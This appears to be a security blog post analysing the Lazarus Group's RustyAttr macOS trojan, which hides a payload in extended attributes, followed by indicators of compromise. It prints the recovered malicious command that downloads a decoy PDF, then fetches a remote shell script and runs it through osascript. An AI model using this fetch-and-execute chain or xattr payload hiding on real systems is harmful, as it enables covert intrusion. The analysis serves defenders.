Hidden World of xattr: Lazarus Group’s Abuse of "Rustyattr" to Evade Detection
Lazarus Group hides malware in macOS extended attributes (xattr), evading detection.
A technique, often overlooked, involves the use of extended file attributes—specifically the xattr
command found in Unix-like operating systems such as macOS and Linux. Much like Windows Alternate Data Streams (ADS), which allows attackers to hide data in the NTFS filesystem, xattr
provides a mechanism for embedding metadata alongside files without altering their visible content.
This stealthy use of xattr
(which we’ll refer to as Rustyattr) has been increasingly leveraged by threat groups, including the Lazarus Group, making it a critical but often overlooked vector in modern cyberattacks. In this post, we’ll look at how the Lazarus Group, in particular, is using xattr
(or Rustyattr) to secretly stash malicious data in system files, making it harder to detect with traditional methods.
This technique is not yet officially recognized in the MITRE ATT&CK Framework, meaning defenders may be unprepared for this subtle, persistent form of attack.
What is xattr
?
xattr
is short for extended attributes, a feature available on Unix-based systems like macOS, Linux, and BSD. It allows you to attach additional metadata to files—data that is separate from the file’s standard attributes, such as size or modification time. This metadata can be anything from custom tags and system-specific information (like quarantine flags) to binary data, making it an incredibly versatile tool for managing files and their related data.
On macOS, for example, xattr
is often used to store data like Finder tags, file quarantine information, and Spotlight search metadata. While these attributes are usually harmless and help improve the system’s functionality, they can be exploited by attackers to hide malicious data in plain sight.
Creating a file and add hidden data via xattr
We start off by creating a simple text file:
# Create a file called secret.txt
touch secret.txt
# Add some text to the file
echo "not so secrect" >> secret.txt
# Display the content inside text file
cat secret.txt
Now, let's use xattr
to store hidden data in the file’s extended attributes Here, we name the attribute com.example.hidden_data
and assign it some value:
xattr -w com.example.hidden_data "This is secret information" secret.txt
Listing the attributes
To see the extended attributes attached to the file, we can run:
xattr secretfile.txt
Viewing the Hidden Data
To view the hidden data stored in the extended attribute, use the following command:
xattr -l secret.txt
Deleting the Hidden Data
Finally, to remove the attribute, we can run:
xattr -d com.example.hidden_data secret.txt
Lazarus Group's Abuse of Extended Attributes
A recent analysis by Group-IB shed light on the Lazarus Group’s use of extended attributes (xattr
) to maintain persistence on macOS systems. This form of code concealment leverages macOS's ability to store metadata alongside files, allowing attackers to hide malicious code in a way that avoids detection by traditional security tools.
The RustyAttr Trojan
According to Group-IB’s findings, the Lazarus Group has developed a trojan named RustyAttr. The name is a nod to the Rust programming language and its integration within the Tauri framework for building cross-platform desktop applications. The RustyAttr trojan takes advantage of macOS extended attributes as a covert persistence mechanism. By embedding malicious code within these attributes, the trojan can remain hidden from file system monitoring tools and antivirus software.
This stealthy technique enables Lazarus Group to persist on compromised systems without triggering alarms from traditional detection systems like VirusTotal, which focuses primarily on scanning visible files and executable.
File Discovery and Analysis
We found an example of the RustyAttr payload on VirusTotal. The sample in question was a zip file named DD Form Questionnaire.zip
with a unique hash (878e3701df9b0abdaa7094e22d067c8398a9fc842cabe917fd5f75f2c84d8552
), which we downloaded onto a macOS machine for further analysis.
After extracting the zip file, we see two files: a .docx
file and an application file (.app
).
To explore extended attributes in the .app
file, we first use the following command with the -r
flag. The -r
(recursive) flag tells the xattr
command to recursively search through all files and sub-directories inside the specified directory.
xattr -r 'Investment Decision-Making Questionnaire.app'
After running the xattr -r
command, we see a list of attribute names attached to the files in the app package, such as com.apple.quarantine
, com.apple.FinderInfo
, and many more.
com.apple.quarantine
: This is a system attribute automatically added by macOS to files downloaded from the internet. It helps the system recognize files that may need to be checked for safety before opening (e.g., by triggering the Gatekeeper or XProtect security features).com.apple.FinderInfo
: Another macOS-specific attribute, typically used by the Finder app to store additional metadata related to file display properties (like icon placement or window size).
The most important one and the one which sticks out is called test
.
Next, we want to look at the actual data stored within the custom test
attribute. To do this, we use the -p
flag. The -p
flag is used to print the contents of a specific extended attribute. In this case, we're telling xattr
to show the data stored in the test
attribute associated with the AwesomeTemplate
executable inside the .app
package.
xattr -p test 'Investment Decision-Making Questionnaire.app/Contents/MacOS/AwesomeTemplate'
This is where we uncover the malicious shell command that the Lazarus Group has embedded in the file.
(curl -o "/Users/Shared/Investment Decision-Making Questionnaire.pdf" "https://filedn.com/lY24cv0IfefboNEIN0I9gqR/dragonfly/Investment%20Decision-Making%20Questionnaire_Epic.pdf" || true) && (open "/Users/Shared/Investment Decision-Making Questionnaire.pdf" || true) && (shell=$(curl -L -k "hxxps[://]support[.]cloudstore[.]business/938689/check"); osascript -e "do shell script $shell")
The command downloads a PDF file to a specific location /Users/Shared/
. This directory is a special folder on macOS intended for sharing files between multiple users on the same machine. Files stored here are accessible by all users (with appropriate permissions). If the system has multiple accounts, placing files here ensures that they can be accessed easily by different users on the same machine.
It then opens that PDF file in the default viewer. Finally, it fetches a shell script from a URL and executes it via AppleScript. The || true
parts ensure that any failures in the individual commands (like network issues or the file not opening) won't stop the entire sequence from running.
Since the URL for the shell script was non-functional during our analysis, the second stage of the payload remains unknown.
hxxps[://]support[.]cloudstore[.]business/938689/check
Domain reputation
To further investigate the source of the malicious payload, we checked the reputation of the domain used in the malicious curl
commands. Using a tool like Validin, we confirmed that the domain associated with the URL is flagged as malicious.
Reviewing the domain's information, we observed that it is linked to an IP address which is categorized as a CERT_DOMAIN-IP
. This type of categorization indicates that the IP address is associated with known threat actor infrastructure, commonly flagged by Computer Emergency Response Teams (CERTs). This connection reinforces the likelihood that the Lazarus Group (or a related actor) is behind the attack, as they are known to use such infrastructure for their campaigns.
By pivoting on the IP address, we can identify other malicious domains hosted on the same infrastructure.
Key observations from Group-IB’s research include:
- The RustyAttr trojan is able to fetch and execute malicious scripts directly from extended attributes, bypassing the file system’s conventional monitoring tools.
- The trojan was initially signed with a leaked certificate, though it was later revoked, and the file’s unnotarized status made it harder to detect via macOS Gatekeeper.
- The Lazarus Group used social engineering to lure victims into running the trojan, often disguised as decoy applications that appeared to be legitimate PDFs or system utilities.
Conclusion
xattr
—like Windows Alternate Data Streams—is a powerful, often-overlooked tool that can be abused for malicious purposes, providing attackers like the Lazarus Group with a stealth persistence mechanism. By hiding critical data and payloads in file metadata, Rustyattr can evade detection by traditional security solutions, allowing attackers to maintain control of compromised systems for extended periods. With this technique not yet documented in the MITRE ATT&CK Framework, it remains a significant and largely unaddressed threat. To stay ahead of these emerging threats, defenders must be proactive in monitoring and securing extended file attributes, ensuring that even the most subtle attack techniques are recognized and mitigated.
For a deeper dive into the RustyAttr malware and how the Lazarus Group is leveraging this technique, check out the original research from Group-IB.
IOC
com.tauri.awesome
e87177e07ab9651b48664c3d22334248e012e8a2bab02f65c93fedd79af0a74f7464850d7d6891418c503d0e1732812d7703d6c1fd5cf3c821f3c202786f9422
022344029b8bf951ba02b11025fe26c99193cb7c8a482c33862c9bbaa5e5528e
48ee5d0d44a015876d867fa515b04c1998fecf19badcbd69f4f3fa8497d57215
DD Form Questionnaire.zip
878e3701df9b0abdaa7094e22d067c8398a9fc842cabe917fd5f75f2c84d8552
DD_Form & Discussion Points.zip
4bce97eff4430708299a1bb4142b9d359d8adf77a2e1673bf76485df25e6d357
====================================================
cloudstore[.]business
docsend[.]site
=====================================================
104[.]168[.]165[.]203
104[.]168[.]157[.]45